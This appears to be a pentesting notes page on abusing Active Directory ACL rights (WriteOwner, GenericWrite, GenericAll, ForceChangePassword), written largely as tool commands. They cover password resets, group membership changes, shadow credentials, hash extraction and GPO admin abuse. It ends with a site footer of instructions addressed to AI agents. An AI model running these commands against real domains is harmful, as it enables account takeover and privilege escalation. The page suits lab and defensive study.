# Abuse ACL

From HTB

## WriteOwner The WriteOwner permission is a special ACE that lets a user change the ownership of an object. If the WriteOwner permission granted on an object, we can change the owner of that object to ourselves or another account we control. Once compromised, we gain full control over the object, allowing us to:\ Modify permissions to grant ourselves additional privileges. Change sensitive properties like resetting the account's password. In an attack scenario, an attacker with WriteOwner on a user account (such as a privileged account) can take ownership of that account, reset its password, and effectively take over the account to escalate privileges. {% tabs %} {% tab title="Remotely" %} With [impacket-owneredit](https://github.com/fortra/impacket/blob/master/examples/owneredit.py) {% code overflow="wrap" %} ```bash owneredit.py -dc-ip -action write -new-owner -target '' /: ``` {% endcode %} Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p set owner ``` {% endcode %} Now, to abuse ownership of a group object, we can modifying the rights with [impacket-dacledit](https://github.com/fortra/impacket/blob/master/examples/dacledit.py).\ Give user WriteMembers permissions (allows user to add or remove members in the target group) {% code overflow="wrap" %} ```bash dacledit.py -action 'write' -rights 'WriteMembers' -principal -target-dn '' /: -dc-ip # dacledit.py 'AAA.BBB'/'alex':'mypass' -action write -rights WriteMembers -principal 'alex' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=AAAA,DC=BBB' -dc-ip 0.0.0.0 ``` {% endcode %} This step effectively allows us to be granted with any privileges or access rights associated with the target group. Finally, you can add members to the group {% code overflow="wrap" %} ```bash net rpc group addmem -U /% -S ``` {% endcode %} and verify that the user was successfully added to the group {% code overflow="wrap" %} ```bash net rpc group members -U /% -S ``` {% endcode %} Alternatively, we can use genericAll permissions to change the user's password. {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p set owner '' '' bloodyAD --host -d -u -p add genericAll '' '' bloodyAD --host -d -u -p set password '' '' ``` {% endcode %} {% endtab %} {% endtabs %} ## GenericWrite Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user. {% tabs %} {% tab title="Remotely" %} #### Remotely 1 With [Certipy](https://github.com/ly4k/Certipy) {% code overflow="wrap" %} ```bash certipy shadow auto -username @ -p -account -dc-ip ``` {% endcode %} {% code overflow="wrap" %} ```bash certipy shadow auto -username @ -hashes -account -dc-ip ``` {% endcode %} #### Remotely 2 By abusing GenericWrite permissions, we added with [pyWhisker](https://github.com/ShutdownRepo/pywhisker) a certificate to the target account as an alternative authentication method. {% code overflow="wrap" %} ```bash pywhisker.py -d -u -p --target --action "add" --dc-ip # take note of password ``` {% endcode %} This certificate can then be used with [gettgtpkinit](https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py) to request a Kerberos TGT as target, giving control over that account. Synchronize time with domain controller with `ntpdate` or `rdate`. 
sudo ntpdate <IP_DC>
{% code overflow="wrap" %} ```bash gettgtpkinit.py / -cert-pfx -pfx-pass -dc-ip # take note of key ``` {% endcode %} Get hash of tgt with [getnthash](https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py) {% code overflow="wrap" %} ```bash export KRB5CCNAME= getnthash.py -key -dc-ip / ``` {% endcode %} {% endtab %} {% tab title="Locally" %} {% code overflow="wrap" %} ```powershell $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('\', $SecPassword) $newPassword = ConvertTo-SecureString '' -AsPlainText -Force ``` {% endcode %} with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) {% code overflow="wrap" %} ```powershell Import-Module .\PowerView.ps1 Set-DomainUserPassword -Identity -AccountPassword $newPassword -Credential $Cred -Verbose ``` {% endcode %} {% endtab %} {% endtabs %} ## GenericAll Full permissions on object ### **GenericAll to a user** {% tabs %} {% tab title="Remotely" %} Allows us to modify properties and have control of a user.\ We can reset the password of the user without knowing their current one. {% code overflow="wrap" %} ```bash net rpc password -U /% -S ``` {% endcode %} Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) (PtH) {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p set password "" "" ``` {% endcode %} {% endtab %} {% endtabs %} ### **GenericAll to a group** {% tabs %} {% tab title="Remotely" %} Allows us to add members to that group. {% code overflow="wrap" %} ```bash net rpc group addmem "" "" /% -S ``` {% endcode %} Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) (PtH) {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p add groupMember "" "" ``` {% endcode %} {% endtab %} {% tab title="Locally" %} ```powershell Net group "" /add /domain ``` {% code overflow="wrap" %} ```powershell $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('\', $SecPassword) ``` {% endcode %} with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) {% code overflow="wrap" %} ```powershell Import-Module .\PowerView.ps1 Add-DomainGroupMember -Identity '' -Members '' -Credential $Cred -Verbose ``` {% endcode %} Check {% code overflow="wrap" %} ```powershell Get-DomainGroupMember -Identity "" | Select MemberName ``` {% endcode %} {% endtab %} {% endtabs %} ### **GenericAll to a GPO** With [pyGPOAbuse](https://github.com/Hackndo/pyGPOAbuse) add **`john`** user to local administrators group (Password: **`H4x00r123..`**) {% code overflow="wrap" %} ```powershell ./pygpoabuse.py / [-hashes :] -gpo-id "" ``` {% endcode %} We can also use [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) with windows. {% code overflow="wrap" %} ```powershell .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount --GPOName "” ``` {% endcode %} {% code overflow="wrap" %} ```powershell gpupdate /force ``` {% endcode %} ## ForceChangePassword {% tabs %} {% tab title="Remotely" %} {% code overflow="wrap" %} ```bash net rpc password -U /% -S ``` {% endcode %} Or with [bloodyAD](https://github.com/CravateRouge/bloodyAD) (PtH) {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p set password "" "" ``` {% endcode %} {% endtab %} {% endtabs %} ## AddSelf With [bloodyAD](https://github.com/CravateRouge/bloodyAD) {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p add groupMember ``` {% endcode %} ## [Targeted Kerberoasting](/rednote/pentesting-process/active-directory/kerberoasting.md#targeted-kerberoasting) With `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN`. *** ## *Other* ### *Modify Attribute* with [bloodyAD](https://github.com/CravateRouge/bloodyAD). {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p get object "" # ... # userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT (value:2) ``` {% endcode %} {% code overflow="wrap" %} ```bash bloodyAD --host -d -u -p set object "" userAccountControl -v '512' -h # ... # userAccountControl: NORMAL_ACCOUNT ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/abuse-acl.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.